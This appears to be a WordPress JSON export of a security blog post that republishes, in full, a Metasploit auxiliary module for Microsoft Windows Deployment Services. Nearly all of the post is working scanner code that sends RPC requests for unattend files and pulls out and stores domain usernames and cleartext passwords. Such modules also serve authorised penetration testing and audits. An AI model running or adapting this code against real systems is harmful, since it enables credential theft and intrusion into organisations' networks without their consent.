{"id":59325,"date":"2024-09-01T03:00:05","date_gmt":"2024-09-01T00:00:05","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180944\/windows_deployment_services.rb.txt"},"modified":"2024-09-01T03:00:05","modified_gmt":"2024-09-01T00:00:05","slug":"microsoft-windows-deployment-services-unattend-retrieval","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/microsoft-windows-deployment-services-unattend-retrieval\/","title":{"rendered":"Microsoft Windows Deployment Services Unattend Retrieval"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner<\/p>\n

DCERPCPacket = Rex::Proto::DCERPC::Packet
DCERPCClient = Rex::Proto::DCERPC::Client
DCERPCResponse = Rex::Proto::DCERPC::Response
DCERPCUUID = Rex::Proto::DCERPC::UUID
WDS_CONST = Rex::Proto::DCERPC::WDSCP::Constants<\/p>\n

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Microsoft Windows Deployment Services Unattend Retrieval’,
‘Description’ => %q{
This module retrieves the client unattend file from Windows
Deployment Services RPC service and parses out the stored credentials.
Tested against Windows 2008 R2 x64 and Windows 2003 x86.
},
‘Author’ => [ ‘Ben Campbell’ ],
‘License’ => MSF_LICENSE,
‘References’ =>
[
[ ‘URL’, ‘http:\/\/msdn.microsoft.com\/en-us\/library\/dd891255(prot.20).aspx’],
[ ‘URL’, ‘http:\/\/rewtdance.blogspot.com\/2012\/11\/windows-deployment-services-clear-text.html’]],
))<\/p>\n

register_options(
[
Opt::RPORT(5040),
])<\/p>\n

deregister_options(‘CHOST’, ‘CPORT’, ‘SSL’, ‘SSLVersion’)<\/p>\n

register_advanced_options(
[
OptBool.new(‘ENUM_ARM’, [true, ‘Enumerate Unattend for ARM architectures (not currently supported by Windows and will cause an error in System Event Log)’, false])
])
end<\/p>\n

def run_host(ip)
begin
query_host(ip)
rescue ::Interrupt
raise $!
rescue ::Rex::ConnectionError => e
print_error(“#{ip}:#{rport} Connection Error: #{e}”)
ensure
# Ensure socket is pulled down afterwards
self.dcerpc.socket.close rescue nil
self.dcerpc = nil
self.handle = nil
end
end<\/p>\n

def query_host(rhost)
# Create a handler with our UUID and Transfer Syntax<\/p>\n

self.handle = Rex::Proto::DCERPC::Handle.new(
[
WDS_CONST::WDSCP_RPC_UUID,
‘1.0’,
],
‘ncacn_ip_tcp’,
rhost,
[datastore[‘RPORT’]])<\/p>\n

print_status(“Binding to #{handle} …”)<\/p>\n

self.dcerpc = Rex::Proto::DCERPC::Client.new(self.handle, self.sock)
vprint_good(“Bound to #{handle}”)<\/p>\n

report_service(
:host => rhost,
:port => datastore[‘RPORT’],
:proto => ‘tcp’,
:name => “dcerpc”,
:info => “#{WDS_CONST::WDSCP_RPC_UUID} v1.0 Windows Deployment Services”
)<\/p>\n

table = Rex::Text::Table.new({
‘Header’ => ‘Windows Deployment Services’,
‘Indent’ => 1,
‘Columns’ => [‘Architecture’, ‘Type’, ‘Domain’, ‘Username’, ‘Password’]})<\/p>\n

creds_found = false<\/p>\n

WDS_CONST::ARCHITECTURE.each do |architecture|
if architecture[0] == :ARM && !datastore[‘ENUM_ARM’]vprint_status “Skipping #{architecture[0]} architecture due to adv option”
next
end<\/p>\n

begin
result = request_client_unattend(architecture)
rescue ::Rex::Proto::DCERPC::Exceptions::Fault => e
vprint_error(e.to_s)
print_error(“#{rhost} DCERPC Fault – Windows Deployment Services is present but not configured. Perhaps an SCCM installation.”)
return nil
end<\/p>\n

unless result.nil?
loot_unattend(architecture[0], result)
results = parse_client_unattend(result)<\/p>\n

results.each do |result|
unless result.empty?
if result[‘username’] and result[‘password’]print_good(“Retrieved #{result[‘type’]} credentials for #{architecture[0]}”)
creds_found = true
domain = “”
domain = result[‘domain’] if result[‘domain’]report_creds(domain, result[‘username’], result[‘password’])
table << [architecture[0], result[‘type’], domain, result[‘username’], result[‘password’]]end
end
end
end
end<\/p>\n

if creds_found
print_line
table.print
print_line
else
print_error(“No Unattend files received, service is unlikely to be configured for completely unattended installation.”)
end
end<\/p>\n

def request_client_unattend(architecture)
# Construct WDS Control Protocol Message
packet = Rex::Proto::DCERPC::WDSCP::Packet.new(:REQUEST, :GET_CLIENT_UNATTEND)<\/p>\n

guid = Rex::Text.rand_text_hex(32)
packet.add_var( WDS_CONST::VAR_NAME_CLIENT_GUID, guid)<\/p>\n

# Not sure what this padding is for…
mac = [0x30].pack(‘C’) * 20
mac << Rex::Text.rand_text_hex(12)
packet.add_var( WDS_CONST::VAR_NAME_CLIENT_MAC, mac)<\/p>\n

arch = [architecture[1]].pack(‘C’)
packet.add_var( WDS_CONST::VAR_NAME_ARCHITECTURE, arch)<\/p>\n

version = [1].pack(‘V’)
packet.add_var( WDS_CONST::VAR_NAME_VERSION, version)<\/p>\n

wdsc_packet = packet.create<\/p>\n

vprint_status(“Sending #{architecture[0]} Client Unattend request …”)
dcerpc.call(0, wdsc_packet, false)
timeout = datastore[‘DCERPC::ReadTimeout’]response = Rex::Proto::DCERPC::Client.read_response(self.dcerpc.socket, timeout)<\/p>\n

if (response and response.stub_data)
vprint_status(‘Received response …’)
data = response.stub_data<\/p>\n

# Check WDSC_Operation_Header OpCode-ErrorCode is success 0x000000
op_error_code = data.unpack(‘v*’)[19]if op_error_code == 0
if data.length < 277
vprint_error(“No Unattend received for #{architecture[0]} architecture”)
return nil
else
vprint_status(“Received #{architecture[0]} unattend file …”)
return extract_unattend(data)
end
else
vprint_error(“Error code received for #{architecture[0]}: #{op_error_code}”)
return nil
end
end
end<\/p>\n

def extract_unattend(data)
start = data.index(‘<?xml’)
finish = data.index(‘<\/unattend>’)
if start and finish
finish += 10
return data[start..finish]else
print_error(“Incomplete transmission or malformed unattend file.”)
return nil
end
end<\/p>\n

def parse_client_unattend(data)
begin
xml = REXML::Document.new(data)
return Rex::Parser::Unattend.parse(xml).flatten
rescue REXML::ParseException => e
print_error(“Invalid XML format”)
vprint_line(e.message)
return nil
end
end<\/p>\n

def loot_unattend(archi, data)
return if data.empty?
p = store_loot(‘windows.unattend.raw’, ‘text\/plain’, rhost, data, archi, “Windows Deployment Services”)
print_good(“Raw version of #{archi} saved as: #{p}”)
end<\/p>\n

def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: ‘tcp’,
workspace_id: myworkspace_id
}<\/p>\n

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)<\/p>\n

login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]}.merge(service_data)<\/p>\n

create_credential_login(login_data)
end<\/p>\n

def report_creds(domain, user, pass)
report_cred(
ip: rhost,
port: 4050,
service_name: ‘dcerpc’,
user: “#{domain}\\\\#{user}”,
password: pass,
proof: domain
)
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::DCERPCinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::Scanner DCERPCPacket = Rex::Proto::DCERPC::PacketDCERPCClient = Rex::Proto::DCERPC::ClientDCERPCResponse = Rex::Proto::DCERPC::ResponseDCERPCUUID = Rex::Proto::DCERPC::UUIDWDS_CONST = Rex::Proto::DCERPC::WDSCP::Constants def initialize(info = {})super(update_info(info,‘Name’ => ‘Microsoft Windows Deployment Services Unattend Retrieval’,‘Description’ => %q{This module retrieves the client unattend file from WindowsDeployment Services RPC service and parses out the …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59325","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59325","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59325"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59325\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59325"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59325"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59325"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}